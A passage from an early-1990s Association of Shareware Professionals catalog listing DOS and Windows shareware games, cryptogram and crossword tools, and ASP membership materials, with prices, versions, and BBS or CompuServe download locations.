HUGO II, + WHODUNIT? + Version: 1.6 (06-02-91) + User benefits: Hint booklet, playback mode, HUGO II, WHODUNIT? + Look for: availability unknown on BBSs; HUGO.EXE in IBMNEW forum + LIB 3 on CompuServe. + Download size: 230k + Description: + Voted one of the top ten all-time best shareware games! Using a + combination of colorful 3-D EGA animation and text. You + control HUGO'S destiny as he tries to rescue his sweetheart, + Penelope, imprisoned somewhere inside the haunted house, and + must solve the various puzzles and challenges encountered + during his quest. + + Product: MAZE3 + 3D Maze/Cave creation and exploration game. See full + description on page 405. + + Product: T-Zero + Needs: IBM PC, DOS 2.1 or better. 256k RAM. + Author: Dennis Cunningham + Registration: $15.00 + Registration benefits: Most recent version complete with a + context-sensitive hint facility. + Version: 1.03 (05-19-91) + User benefits: Most recent version complete with a context- + sensitive hint facility. + Look for: T-ZERO.ZIP on BBSs (call 414-789-4210 to download it at + no charge); T-ZERO.ZIP in IBMNEW forum LIB 3 on CompuServe; T- + ZERO.ZIP in IBMPC RTC LIB 7 on GEnie. + Download size: 232k + Description: + This game, mixing elements of fantasy and science fiction while + exploring the nature of time, is dedicated to all gamers + saddened by the premature death knell sounded for text + adventures. Scenes take place in a rustic but disturbing + present; a bustling prehistoric era; and a damaged, + bureaucratic future. Features: input buffer, player-definable + function keys, DOS shell, Restart/Save/Restore/Undo, + directional or cursor keyboard control, produce hard copy of + game's prose. Advanced difficulty level. + + Chapter 17, "Games" 412 + + + + Product: Volcano Hunter + Needs: IBM AT (80286), DOS 3.1 or better. 16MHz or faster + computer. VGA monitor. + Author: Informative Technologies, 202-675-4528 + Registration: $10.00 + Registration benefits: A printed map of the screens in Volcano + Hunter; Several evaluation versions of other software from + Informative Technologies; A certificate for $7 off a + subscription to Shareware Magazine; A certificate for a free + CompuServe membership. + Version: 1.0 (06-15-91) + User benefits: A printed map of the screens in Volcano Hunter; + Several evaluation versions of other software from Informative + Technologies; A certificate for $7 off a subscription to + Shareware Magazine; A certificate for a free CompuServe + membership. + Look for: VOLCANO.ZIP on BBSs (call 301-596-1180 to download it + at no charge); VOLCAN.ZIP in IBMNEW forum LIB 3 on CompuServe. + Download size: 55k + Description: + Monsters, treacherous ledges, hot lava, water-filled caverns, + conveyor belts, moving platforms, beamers, secret doors, + hotplates, timer bombs and more contribute to the action. Over + 200 screens of cities, mountains and caverns. Blow up, burn up, + drown, fall to your death or be killed by the Druts. But, you + could survive and escape with gold beyond your imagination and + save the city. + + Product: ZZT Arcade-Adventure Game + Lots of arcade action & puzzle solving. See full description + on page 398. + + + 17.14 Word games + + Product: Babble! + Creativity tool for writers. See full description on page 142. + + Product: Cipher + Needs: IBM PC, DOS 2.1 or better. + Author: Arcanum Computing + Registration: $15.00 + Registration benefits: Master disks, additional puzzles. + Version: 2.1 (10-09-91) + User benefits: Master disks, additional puzzles. + Look for: CIPHER21.ZIP on BBSs (call 508-875-3618 to download it + at no charge); CIPHER.ZIP in GAMERS forum LIB 13 on CompuServe. + Download size: 87k + Description: + A crypto-quotes type word puzzle game, similar to the kind you + might find in the Sunday newspaper. However, this version runs + in colorful hi-res VGA or EGA graphics mode and allows you to + play using a mouse (text modes and keyboard are also + supported). Features include help, hints, save/restore. User + + Chapter 17, "Games" 413 + + + + can create their own puzzle files from either plain text quotes + or from already encrypted quotes. + + Product: Cipher for Windows + Needs: IBM PC, Windows 3.0 or better. + Author: Arcanum Computing + Registration: $15.00 + Registration benefits: Master disks, additional puzzles. + Version: 1.0 (10-02-91) + User benefits: Master disks, additional puzzles. + Look for: CIPHWN10.ZIP on BBSs (call 508-875-3618 to download it + at no charge); CIPHWN.ZIP in GAMERS forum LIB 13 on CompuServe. + Download size: 112k + Description: + A crypto-quotes type word puzzle game, similar to the kind you + might find in the Sunday newspaper. However, this version runs + in colorful hi-res VGA or EGA graphics mode under the Microsoft + Windows 3.x environment and allows you to play using a mouse. + Features include standard Windows style hypertext help, hints, + save/restore. User can also create their own puzzle files from + plain text or already encrypted quotes. + + Product: CROSSDOWN [***] + Needs: IBM PC, DOS 3.2 or better. + Author: CROSSDOWN, 716-482-8092 + Registration: $25.75 + Registration benefits: Printed manual, free upgrade, support, + puzzle-making advice. + Version: 2.6 (02-24-92) + User benefits: Printed manual, free upgrade, support, puzzle- + making advice. + Look for: XDOWN26.ZIP on BBSs (call 716-723-8489 to download it + at no charge); XDOWN2.ZIP in IBM:NEW forum LIB 8 on CompuServe; + XDOWN26.ZIP in IBM-PC RTC LIB 7 on GEnie. + Download size: 146k + Description: + Solve and construct real crossword puzzles on your computer! + CROSSDOWN's developer, Sam Bellotto Jr., has contributed + puzzles to The New York Times, Simon and Schuster and many + other puzzle markets. Features great graphics, a very easy-to- + use interface, animated selection buttons, sound effects, a + "cheat" feature and a "hint" key. Puzzles can also be printed + out with separate utilities; standard numbering is added + automatically! Seven sample crosswords of assorted sizes + included. + + Product: Crossword Clipper for Windows + Crossword puzzle layout/publishing tool. See full description + on page 135. + + Chapter 17, "Games" 414 + + + + Product: Crossword Creator + Needs: IBM PC, DOS 2.1 or better. 320k RAM; IBM-compatible + printer. + Author: PC HELP-LINE, 714-797-3091 + Registration: $50.00 + Registration benefits: Printed manual, master disks, technical + support. + Version: 5.00 (02-01-92) + User benefits: Printed manual, master disks, technical support. + Look for: CWC.ZIP on BBSs; CWC.ZIP in IBMNEW forum LIB 8 on + CompuServe. + Download size: 224k + Description: + This crossword puzzle "editor" gives you all the tools you need + to quickly design and print your own crosswords. Pull-down + menus, mouse support, comprehensive on-line help. Can generate + freeform puzzles from a word list or ASCII file. + + Works with a companion program, Crossword Clipper for Windows, + so you can paste your puzzles into desktop publishing + applications. A great tool for trainers and teachers, great + fun for trainees and students. Spanish and French versions + available. + + Product: EGAWHEEL + Needs: IBM PC, DOS 2.0 or better. EGA monitor. + Author: WHEEL Games + Registration: $10.00 + Registration benefits: 90 days support, 12,000 puzzle database. + Version: V.17.0S (01-01-92) + User benefits: 90 days support, 12,000 puzzle database. + Look for: availability unknown on BBSs; EGAWHE.ZIP in IBMNEW + forum LIB 8 on CompuServe. + Download size: 96k + Description: + A "Wheel of Fortune"/hangman type of word guessing game for IBM + compatible computers with EGA video card and monitor. The game + features: a colorful spinning wheel, 1-3 players, 5 rounds of + play, a sound on/off option, automatic win after all letters of + the puzzle are bought and guessed, a high score table for the + top ten WHEELERS, and an editor to add/delete/modify puzzles. + The editor may be used to create a custom database for a + teaching aid from grade school through college. + + Chapter 17, "Games" 415 + + + + Product: ENIGMACROSS [***] + Needs: IBM PC, DOS 3.2 or better. EGA monitor, mouse. + Author: CROSSDOWN, 716-482-8092 + Registration: $25.75 + Registration benefits: Printed manual, free upgrade, support, + puzzle-making advice. + Version: 1.0 (04-09-92) + User benefits: Printed manual, free upgrade, support, puzzle- + making advice. + Look for: ENIGMAX.ZIP on BBSs (call 716-723-8489 to download it + at no charge); ENIGMA.ZIP in IBM:NEW forum LIB 8 on CompuServe; + ENIGMAX.ZIP in IBMPC RTC LIB 7 on GEnie. + Download size: 109k + Description: + You can both solve and construct professional quality acrostic + puzzles. Easy-to-use graphical interface features animated + selection buttons, sound effects, pop-up windows. You can solve + more than one puzzle per session. Both "cheat" and "hint" + features included. On-screen help guides you through + construction process. Separate utilities print hi-res hard + copies to most printers; acrostic numbering added + automatically. Another superb word game from the author of + CROSSDOWN. + + Product: Fictionary + Needs: IBM PC, DOS 2.1 or better. + Author: Cascoly Software, 206-523-6135 + Registration: $20.00 + Registration benefits: Phone/CIS support. + Version: 1.32 (04-30-90) + User benefits: Phone/CIS support. + Look for: availability unknown on BBSs; FICT.ZIP in IBMNEW forum + LIB 8 on CompuServe. + Download size: 70k + Description: + The game of fantastic and farfetched definitions. Each round a + player chooses a word. You can choose your own word or pick one + from the large selection included with the game. Each other + player makes up their own definition for the word. Everyone + votes for the word they think is correct and points are scored + for guessing the proper one, or misleading other players. Great + vocabulary builder. Can be played by 1-6. + + Chapter 17, "Games" 416 + + + + Product: Hangman for Students + Needs: IBM PC, DOS 2.0 or better. + Author: Langin Software, 618-532-4899 + Registration: $19.00 + Registration benefits: CompuServe/mail support. + Version: 1.01 (03-09-91) + User benefits: CompuServe/mail support. + Look for: availability unknown on BBSs; HANG.ZIP in IBMNEW forum + LIB 6 on CompuServe. + Download size: 181k + Description: + The classic hangman game with word lists divided by grade + levels, from Grade 1 to Grade 5, plus junior high and senior + high. It offers enough chances so that kids can win frequently + and stay interested in the game. Adults may be surprised that + they like to play, too. Parents can create additional word + lists. Over 4,500 words. + + Product: NAMEGRAM + Needs: IBM PC, DOS 2.0 or better. 256k RAM. + Author: Neil J. Rubenking + Registration: $25.00 + Registration benefits: 100,000-word dictionary, utility to add/ + remove words (up to 32 letters) in the dictionary. + Version: 3.0 (06-12-89) + User benefits: 100,000-word dictionary, utility to add/remove + words (up to 32 letters) in the dictionary. + Look for: availability unknown on BBSs; NAMEGM.ARC in + ZNT:UTILFORUM forum LIB 8 on CompuServe. + Download size: 260k + Description: + Takes any name or phrase and makes anagrams of it using a + 90,000 word dictionary of words up to 11 letters. E.g. "TURBO + PASCAL" becomes "LABORS AT CPU"; "COLONEL OLIVER NORTH" becomes + "I CONTROL HONOR LEVEL". Menu-driven, supports mouse, works + with text screen sizes from 80x25 to 132x43 or more. Option to + pre-select words for anagrams OR let the computer do it all. + Can print list of all words that can be made from input phrase. + Amuse your friends by anagramming their names. + + Product: Poetry Generator + Turn your computer into a poet! See full description on + page 143. + + Product: Poetry Star [***] + AI poetry writing for entertainment, educ. See full + description on page 423. + + Chapter 17, "Games" 417 + + + + Product: VGAWHEEL + Needs: IBM PC, DOS 2.0 or better. VGA monitor. + Author: WHEEL Games + Registration: $10.00 + Registration benefits: 90 days support, 12,000 puzzle database. + Version: V.1.70S (01-01-92) + User benefits: 90 days support, 12,000 puzzle database. + Look for: availability unknown on BBSs; VGAWHE.ZIP in IBMNEW + forum LIB 8 on CompuServe. + Download size: 95k + Description: + A "Wheel of Fortune"/Hangman type of word guessing game. The + game features: a colorful spinning wheel, 1-3 players, 5 rounds + of play, a sound on/off option, automatic win after all letters + have been bought and guessed, a high score table for the top + ten WHEELERS, and an editor to add/delete/modify puzzles. The + editor may be used to create a custom database for using the + program as a teaching aid in grade school through college. + + Product: WINWHEEL + Needs: IBM PC, Windows 3.0 or better. (Does not run in Windows + 3.0 "real" mode.) VGA monitor, mouse, VBRUN100.DLL run-time + module for Visual Basic applications. + Author: WHEEL Games + Registration: $19.00 + Registration benefits: Database of over 12,000 puzzles. + Version: 1.40 (03-15-92) + User benefits: Database of over 12,000 puzzles. + Look for: availability unknown on BBSs; WINWHE.ZIP in WINADV + forum LIB 6 on CompuServe. + Download size: 146k + Description: + A Wheel of Fortune/Hangman type word guessing game for Windows + 3.X. Features: colorful graphics, 1-3 players, 5 rounds, sound + on/off toggle, autowin after all letters bought and guessed, + hi-score table for top 10 WHEELERS, and a puzzle editor to add/ + delete/modify puzzles. + + Chapter 17, "Games" 418 + + + + 17.14.1 Cryptanalysis + + Product: The Cipher-Ace Series + Needs: IBM PC, DOS 2.0 or better. 256K RAM. + Author: Charles W. Stewart, 407-855-6148 + Registration: $20.00 + Registration benefits: Printed manual, six months mail/email + support, shareware disks of other programs. + Version: 2.0 (02-28-92) + User benefits: Printed manual, six months mail/email support, + shareware disks of other programs. + Look for: CIFA20.ZIP on BBSs; CIFA20.ZIP in IBMNEW forum LIB 6 on + CompuServe. + Download size: 200k + Description: + Introduces the user to subject of Cryptography. Provides work + screen and help menus for de-crypting two cipher types, with + sample ciphers. Enter and save messages. Encrypt own messages + for sending. Text files of associations and publications. + Catalog in files. + + + 17.15 Pinball/paddleball + + Product: TiltMaze + Try to roll the smiley balls into the center. See full + description on page 397. + + + 17.16 Strategy/simulation + + Product: AntiC + Needs: IBM PC, DOS 3.0 or better. EGA monitor; MS compatible + mouse. + Author: Cascoly Software, 206-523-6135 + Registration: $20.00 + Registration benefits: Phone/CompuServe support, more puzzles. + Version: 1.11 (02-02-92) + User benefits: Phone/CompuServe support, more puzzles. + Look for: availability unknown on BBSs; ANTICX.ZIP in IBMNEW + forum LIB 6 (multiple files) on CompuServe. + Download size: 80k + Description: + A cross between Othello and Life. Each square sends its color + to the neighboring squares in the network. If only one color + comes into a square, it takes that color. If two colors come + in, they cancel and the square assumes the third color. Each + time you change a square, all squares in the pattern are + recalculated and redrawn. change puzzles and display + + Chapter 17, "Games" 419 + + + + Product: ATC: Air Traffic Controller + Needs: IBM PC, DOS 2.1 or better. Hercules or CGA monitor. + Author: Cascoly Software, 206-523-6135 + Registration: $20.00 + Registration benefits: Phone/CompuServe support. + Version: 1.0 (09-29-85) + User benefits: Phone/CompuServe support. + Look for: ATC.ZIP on BBSs. + Download size: 60k + Description: + An air traffic controller game that's perfect for a few minutes + or hours of fun. Easy to learn, but difficult to master. The + game tracks best scores at each of 20 levels of difficulty. + Ages 10 and up. + + Product: Border + Needs: IBM PC, DOS 2.1 or better. CGA monitor. + Author: Cascoly Software, 206-523-6135 + Registration: $20.00 + Registration benefits: Phone/CompuServe support. + Version: 1.1 (02-23-89) + User benefits: Phone/CompuServe support. + Look for: BORDER.ZIP on BBSs. + Download size: 70k + Description: + A combination of GO and connect the dots, this abstract + strategy game for 2 players involves enclosing more area than + your opponent, while preventing them from stopping you. Ages 12 + and up. + + Product: Circle Link + Needs: IBM PC, DOS 3.0 or better. EGA monitor. + Author: ShareGames, 619-283-0472 + Registration: $10.00 + Registration benefits: Latest Version, Free updates for 6 Months, + & 24 Hr Tech Support. + Version: 1.1 (06-12-90) + User benefits: Latest Version, Free updates for 6 Months, & 24 Hr + Tech Support. + Look for: CIRCLINK.ZIP on BBSs (call 619-440-0899 to download it + at no charge). + Download size: 61k + Description: + To win, you must get your marbles to the bottom of the linked + circles first. You select a row or column of links by pressing + a number or alphabet key. That row or column will change its + color and rotate at random one quarter turn left or right. If + a circle's opening matches the link next to it, the marble will + move left, right, or down. If a link is already occupied, the + opponent's will have to start at the top again. Up to four + players, including the computer, can play. + + Chapter 17, "Games" 420 + + + + Product: Ecomaster + Needs: IBM PC, DOS 2.1 or better. CGA monitor. + Author: Cascoly Software, 206-523-6135 + Registration: $20.00 + Registration benefits: Phone/CompuServe support. + Version: 1.1 (11-15-90) + User benefits: Phone/CompuServe support. + Look for: availability unknown on BBSs; ECO.ZIP in IBMNEW forum + LIB 6 on CompuServe. + Download size: 60k + Description: + A diverting ecology game for one or more players in which you + bid for and trade animals based on their abilities to thrive in + different environments. No previous biological experience is + assumed. Mildly educational without belaboring the point. For + 1 or more players. Typical games last less than an hour. For + ages 10 and up. + + Product: GREEN + Author: Cascoly Software, 206-523-6135 + Registration: $25.00 + Registration benefits: Phone/CompuServe support. + Version: 1.02 (03-30-92) + User benefits: Phone/CompuServe support. + Look for: availability unknown on BBSs; GREENX.ZIP in IBMNEW + forum LIB 6 on CompuServe. + Download size: 140k + Description: + Help the planters as they work to prevent the pavers from + turning farms into parking lots. Pavers include mall + developers, real estate agents, clear-cut loggers and other + exploiters. There are several different maps, of varying + difficulty. You have the ability to plant hedges, add walls, + and to destroy pavement. Unique, yet similar in concept to + Populous and SimCity. + + Product: Nine Men's Morris + Needs: IBM PC, DOS 2.0 or better. + Author: Langin Software, 618-532-4899 + Registration: $10.00 + Registration benefits: CompuServe/mail support. + Version: 1.03 (05-31-91) + User benefits: CompuServe/mail support. + Look for: availability unknown on BBSs; NINE.ZIP in IBMNEW forum + LIB 6 on CompuServe. + Download size: 114k + Description: + An ancient strategy game also called "The Mill." Get "three in + a row" to take your opponent's pieces. Is somewhat like tic- + tac-toe, but expanded. Looks easy, but isn't. Play against + the computer. Switch sides. Take back moves. Hypertext help + system. Supports mouse. Warning: You may get hooked. + + Chapter 17, "Games" 421 + + + + Product: Play For Mate [***] + Game for Women Only : Discreet Event Simulati. See full + description on page 422. + + Product: Tear Down the Wall + Needs: IBM PC, DOS 2.0 or better. + Author: Langin Software, 618-532-4899 + Registration: $10.00 + Registration benefits: CompuServe/mail support. + Version: 1.02 (05-06-91) + User benefits: CompuServe/mail support. + Look for: availability unknown on BBSs; WALL.ZIP in IBMNEW forum + LIB 6 on CompuServe. + Download size: 109k + Description: + Tear down the wall without using a pick or going to Berlin. + Great strategy game. Supports a mouse. The winner is the one + who destroys the biggest and most bricks. Each wall is + different, and hard and weak bricks effect how the wall falls. + Think ahead: A good move by you may leave a better move for + the computer. Hypertext help system. Don't think you can beat + the computer! + + Product: WEBS + Needs: IBM PC, DOS 3.0 or better. Mouse; EGA monitor. + Author: Cascoly Software, 206-523-6135 + Registration: $20.00 + Registration benefits: Phone/CompuServe support. + Version: 1.16 (02-27-92) + User benefits: Phone/CompuServe support. + Look for: availability unknown on BBSs; WEBS.ZIP in IBMNEW forum + LIB 6 on CompuServe. + Download size: 70k + Description: + A deceptively simple solitaire game requiring both strategy and + cunning. You claim nodes on a web while trying to limit the + moves available to your opponent. Automatic display of + potential moves, a variety of webs and difficulties give hours + of challenge. + + Chapter 17, "Games" 422 + + + + 17.17 Puzzles, mix & match + + Product: DressMeUp + Needs: IBM PC, DOS 3.0 or better. EGA monitor. + Author: ShareGames, 619-283-0472 + Registration: $25.00 + Registration benefits: Latest Version, Free updates for 6 Months, + & 24 Hr Tech Support. + Version: 2.2 (11-14-90) + User benefits: Latest Version, Free updates for 6 Months, & 24 Hr + Tech Support. + Look for: DRESSUP.ZIP on BBSs (call 619-440-0899 to download it + at no charge). + Download size: 134k + Description: + An imaginative paper doll game with a cute collection of + animals to dress up. A girl and a boy may be picked from any + of four kinds of stuffed animals on the shelf to play with. + There are blouses, skirts, slacks, hose, purses, jackets, + shoes, hats, coats, shirts, sweaters, pants, and socks hidden + behind the cabinet doors to choose from. Comes with two + complete outfits for the girl and boy animals and eight more + outfits can be added to their wardrobes. + + + 17.18 For adults + + Product: Get Lucky! + Needs: IBM PC, DOS 2.0 or better. CGA monitor. + Author: Glencoe Computing, 314-458-2863 (EVE) + Registration: $24.99 + Registration benefits: Latest version, additional trivia + questions. + Version: 2.25 (06-05-89) + User benefits: Latest version, additional trivia questions. + Look for: GL-225.EXE on BBSs; GL-225.EXE in IBMNEW forum LIB 8 on + CompuServe. + Download size: 118k + Description: + A multi-faceted adult oriented game package which featurs five + variations of Trivia and Poker, 2 of which are played in "adult + party" mode with an intimate friend (or one you would like to + be more intimate with). Also included are one & two player + Trivia and "The Poker Machine" which simulates the poker + gambling machines found in many casinos. + + Chapter 17, "Games" 423 + + + + Product: Play For Mate [***] + Needs: IBM PC, DOS 3.3 or better. VGA monitor, hard disk. + Author: Niche Software, 714-892-9052 + Registration: $10.00 + Registration benefits: Game hints. + Version: 1.1 (03-28-92) + User benefits: Game hints. + Look for: DATE0*.PCX (multiple files) on BBSs (call 714-636-2667 + to download it at no charge). + Download size: 2300k + Description: + This is a game for women only that is easy to operate. The + player is prompted for her user profile. She then simulates + real life events in meeting men. She experiences an 8 ball of + dating. She may elect to talk to the responsive male before + serious commitment. She interacts with one of five male + personality types: the Traditional Male; the Cocky Male; the + Rugged Male; the Shy Male; the Committed Male. + + Product: Poetry Star [***] + Needs: IBM PC, DOS 2.1 or better. + Author: Chatfield Software, Inc., 216-569-3201 + Registration: $25.00 + Registration benefits: Unlimited support, free bonus disk, + product discounts. + Version: 1.2 (03-15-92) + User benefits: Unlimited support, free bonus disk, product + discounts. + Look for: CSPS.ZIP on BBSs; CSPS.ZIP in IBMAPP forum LIB 7 on + CompuServe. + Download size: 132k + Description: + This is a highly interactive one-of-a-kind, multi-purpose AI + disk. It is entertaining (conduct zany chats with your PC) and + educational (learn to write poetry in a variety of forms, + styles, and prosodies). It is written in the programming + language INRAC (of "Racter" fame), which means you communicate + with the computer in natural English. You have NEVER seen + anything like it! (This is a spinoff of Chatfield Software's + college CAI "Star Alpha.") For adults. + + + 17.19 Software tools + + 17.19.1 For other + + Product: ZZT Arcade-Adventure Game + Lots of arcade action & puzzle solving. See full description + on page 398. + + Chapter 17, "Games" 424 + + + + 17.20 Other + + Product: Fantasy + Needs: IBM PC, DOS 2.0 or better. CGA monitor. + Author: Natural Software, 708-377-7320 + Registration: $20.00 + Registration benefits: Phone support. + Version: 2.0 (09-01-90) + User benefits: Phone support. + Look for: FANTASY.ZIP on BBSs (call 312-276-4159 to download it + at no charge); FANT.ZIP in IBMNEW forum LIB 5 on CompuServe. + Download size: 100k + Description: + Create flowing graphic images as you move your mouse. If art + can be fleeting, transitory and personal - then Fantasy is an + artist's tool. You are the artist and the audience. It's a tool + for personal performance art. Like building sand castles or + blowing bubbles, each performance is different and highly + personal. + + As you move the mouse the image constantly moves and responds + in never-ending, never-repeating animated sequences. + Performances can be recorded and replayed. Demos included. + + Product: Lotto Challenger + Picks numbers to play and generates tickets. See full + description on page 367. + + Product: The LOTTO SIMULATOR + See how your picks stand up against the odds. See full + description on page 368. + + Product: PEG + Needs: IBM PC, DOS 2.1 or better. Mouse; EGA monitor. + Author: Cascoly Software, 206-523-6135 + Registration: $20.00 + Registration benefits: Phone/CompuServe support. + Version: 1.03 (02-10-92) + User benefits: Phone/CompuServe support. + Look for: availability unknown on BBSs; PEG.ZIP in IBMNEW forum + LIB 6 on CompuServe. + Download size: 80k + Description: + No one really knows when PEG solitaire was invented. Some + stories trace it to prisoners during the French Revolution, but + published descriptions date at least 100 years earlier. Most + likely the game is even older. PEG presents variations on the + classic peg solitaire with multiple starting positions, and + varying endgames. One of the pleasures of playing the game on + your computer is that you can quickly set up the board to try + different strategies. Ages 8 to 88. + + Chapter 17, "Games" 425 + + + + Product: The Pool Manager + Football Pool Organizer/Database (all sports). See full + description on page 372. + + Product: World Name Game + Graphic Geography Game. See full description on page 309. + + Chapter 18, "About shareware" 426 + + + + + + Chapter 18 + About shareware + + + 18.1 Assn. Shareware Professionals + + The Association of Shareware Professionals (ASP) formed in 1987 + to strengthen the future of shareware as an alternative to + traditional (retail) software marketing. It also serves as an + information clearing house for its members and the public at + large. ASP members subscribe to a code of ethics and are + committed to the shareware concept. + + The ASP demands professionalism from its members. Authors must + acknowledge every registration (you get more than just a + canceled check) and they must provide at least three months of + support for their products. ASP members must also live up to + any other benefits they offer. + + You can turn to an ombudsman for help if you can't resolve a + problem with an ASP author or disk vendor. Members must + explain this in every shareware program & disk vendor catalog. + + Few people need the ombudsman's help. ASP members represent + the cream of the crop in the shareware industry, but it's nice + to know you can turn to someone if you think you got a raw + deal. Unfortunately, it happens -- authors have been kicked + out because of repeated complaints. + + The Association monitors Congress for potentially damaging + legislation and has sent spokesmen to testify before + congressional subcommittees. It has also taken on the respon- + sibility of safeguarding the term 'shareware' itself. ASP has + filed motions in countries as far away as England and South + Africa to stop people who attempt to claim it as a trademark + word. + + ASP members 'meet' online in a public forum of the CompuServe + network (GO SHAREWARE). Members send & receive messages, + transmit files, and exchange valuable information. Old hands + in the shareware business pass along their insights to new + members. The group holds public and private debates and + members vote on major issues by sending private messages to the + Association secretary. + + The ASP holds yearly 'face to face' meetings and appears at + various trade shows around the country (including COMDEX and + PC-EXPO). It also provides speakers who lecture on every + aspect of shareware. You can learn more by writing to the + Association of Shareware Professionals, 545 Grover Road, + Muskegon, MI 49442. If you have a modem and a CompuServe + + Chapter 18, "About shareware" 427 + + + + account, you can log on and go to the SHAREWARE forum for more + information. + + + Product: Approved Vendor Requirements + Author: Association of Shareware Professionals, 616-788-5131 + Version: n/a (07-01-91) + Look for: availability unknown on BBSs; VENDOR.ARC in SHAREWARE + forum LIB 2 on CompuServe. + Download size: 4k + Description: + Contains all requirements ASP Approved Vendors must follow. + Potential shareware authors may want to review this file to see + what the ASP uses as its factors for approving disk vendors to + become associate members in the organization. + + Product: ASP BBS Membership Application + Author: Association of Shareware Professionals, 616-788-5131 + Version: n/a (02-15-91) + Look for: availability unknown on BBSs (call 317-856-2087 to + download it at no charge); BBSAPP.ZIP in SHAREWARE forum LIB 2 + on CompuServe. + Download size: 25k + Description: + Everything a BBS Sysop needs to join the ASP. Rules, + application form, text files to post on the BBS, etc. All are + text files. + + The ASP BBS Membership ensures callers that the BBS adheres to + certain standards of quality and shareware support. Cost of + membership is $40 / year. + + Product: ASP Catalog for BBSs + Author: Association of Shareware Professionals, 616-788-5131 + Look for: ASP####.ZIP on BBSs (call 317-856-2087 to download it + at no charge). + Download size: 300k + Description: + An official catalog of shareware products published by members + of the Assocation of Shareware Professionals and available on + computer bulletin board systems (BBSs). Computer users can + download these products and use them on a "try before you buy" + basis. This catalog describes each product and in many cases + identifies a BBS where you can download it for evaluation + purposes at no charge. Products grouped by subject and cross- + referenced to authors' addresses via a comprehensive index. + Editor's note: '####' represents a four-digit number which + increases with each new edition of the catalog. + + Chapter 18, "About shareware" 428 + + + + Product: ASP Catalog for CompuServe + Author: Association of Shareware Professionals, 616-788-5131 + Look for: CIS####.ZIP on BBSs (call 317-856-2087 to download it + at no charge); CATLOG.ZIP in SHAREWARE forum LIB 2 on + CompuServe. + Download size: 235k + Description: + An official catalog of shareware products published by members + of the Association of Shareware Professionals and available on + CompuServe. Computer users can download these products and use + them on a "try before you buy" basis. This catalog describes + each product and gives its location on CompuServe. Products + grouped by subject and cross-referenced to authors' addresses + via a comprehensive index. + Editor's note: '####' represents a four-digit number which + increases with each new edition of the catalog. + + Product: ASP Catalog for GEnie + Author: Association of Shareware Professionals, 616-788-5131 + Look for: GEN####.ZIP on BBSs (call 317-856-2087 to download it + at no charge). + Download size: 100k + Description: + An official catalog of shareware products published by members + of the Assocation of Shareware Professionals and available on + GEnie. Computer users can download these products and use them + on a "try before you buy" basis. This catalog describes each + product and gives its "RoundTable" location on GEnie. Products + grouped by subject and cross-referenced to authors' addresses + via a comprehensive index. + Editor's note: '####' represents a four-digit number which + increases with each new edition of the catalog. + + Product: ASP List of Approved BBSs + Author: Association of Shareware Professionals, 616-788-5131 + Version: n/a (07-01-91) + Look for: availability unknown on BBSs; APPBBS.ZIP in SHAREWARE + forum LIB 2 on CompuServe. + Download size: 30k + Description: + A complete list of ASP Approved BBSs. Gives the name, address, + phone number, conferences, lines, protocols, network + affiliations, etc. Formatted for use as a mailing list or for + browsing. Updated monthly. ASP recommends Approved BBSs. + Editor's note: Appendix C of this catalog contains much of the + same information. + + Chapter 18, "About shareware" 429 + + + + Product: ASP List of Approved Vendors + Author: Association of Shareware Professionals, 616-788-5131 + Version: n/a (07-01-91) + Look for: availability unknown on BBSs; VENDOR.EXE in SHAREWARE + forum LIB 2 on CompuServe. + Download size: 20k + Description: + Complete list of ASP Approved Vendors by country and state or + province. Use this catalog to find the ASP Approved Vendor + nearest you. ASP recommends ASP Approved Vendors as one of the + best sources of high quality, up-to-date shareware programs. + Updated monthly. + Editor's note: Appendix B of this catalog contains much of the + same information. + + Product: How to join as a "beta" author + Author: Association of Shareware Professionals, 616-788-5131 + Version: n/a (11-27-89) + Look for: availability unknown on BBSs; BETA.TXT in SHAREWARE + forum LIB 2 on CompuServe. + Download size: 3k + Description: + A compilation of messages explaining how potential shareware + authors can apply for membership in the ASP before releasing + their first shareware program. + + Product: IBM PC Author Application + Author: Association of Shareware Professionals, 616-788-5131 + Version: n/a (07-01-91) + Look for: APPLIC.ZIP on BBSs (call 317-856-2087 to download it at + no charge); APPLIC.EXE in SHAREWARE forum LIB 2 on CompuServe. + Download size: 35k + Description: + Information on joining the Association of Shareware + Professionals as an author member. This self-extract file + contains several necessary information files and many reasons + why you would wish to join the ASP. Specific to PC/MS-DOS + authors -- see other files in this section if you program on a + different platform (Amiga or MacIntosh for example). + + Product: Information about copyrights + Author: Association of Shareware Professionals, 616-788-5131 + Version: n/a (04-29-90) + Look for: availability unknown on BBSs; COPYRT.ARC in SHAREWARE + forum LIB 4 on CompuServe. + Download size: 3k + Description: + A compilation of messages on why & how you should copyright a + shareware program. + + Chapter 18, "About shareware" 430 + + + + Product: MacIntosh Author Application + Author: Association of Shareware Professionals, 616-788-5131 + Version: n/a (07-01-91) + Look for: availability unknown on BBSs (call 317-856-2087 to + download it at no charge); APPLIC.SIT in SHAREWARE forum LIB 2 + on CompuServe. + Download size: 40k + Description: + Information on joining the Association of Shareware + Professionals as an author member. This self-extract file + contains several necessary information files and many reasons + why you would wish to join the ASP. Specific to MacIntosh + authors -- see other files in this section if you program on a + different platform (Amiga or IBM PC for example). + + + 18.2 Other + + Product: CompUser [***] + Needs: IBM PC, DOS 2.1 or better. Hard disk, IBM Graphics + printer. + Author: Unicorn Software Limited, 219-563-HOME + Registration: $30.00 + Registration benefits: Master disks, phone/BBS/mail support, one + year of free quarterly updates. Shareware disks of other + programs. + Version: 2.70b (04-04-92) + User benefits: Master disks, phone/BBS/mail support, one year of + free quarterly updates. Shareware disks of other programs. + Look for: CU*.ZIP (multiple files) on BBSs (call 317-784-2147 to + download it at no charge); CU*.ZIP in IBMAPP forum LIB 7 + (multiple files) on CompuServe. + Download size: 380k + Description: + A rated cyclopedia of the Shareware community. The data file is + a listing of dealers in shareware, BBSs, authors of Shareware, + magazines and newsletters (Over 3000!). The information is + rated and complete. The list is updated daily and distributed 4 + times a year. The program lets you maintain and work with the + data file, create and edit post cards for mailings to persons + in the data file. Then you may retrieve either listings of the + addresses, address labels, 4X6 cards, or Rolodex cards. + + Chapter 19, "Other" 431 + + + + + + Chapter 19 + Other + + + 19.1 Software tools + + 19.1.1 For multiple programs + + Product: BootMaster [***] + Boot Configuration Manager. See full description on page 75. + + 19.1.2 For other + + Product: PBMouse + Mice with many text and graphic cursors. See full description + on page 287. + + Product: STAFF-DEVELOPER + Free RunTime Licence for Database Engines. See full + description on page 431. + + + 19.2 Other + + Product: Simply Labels + Needs: IBM PC, DOS 2.1 or better. 256k RAM. + Author: SimpleWare, 709-489-3757 + Registration: $25.00 + Registration benefits: Latest version with shareware notices + removed. 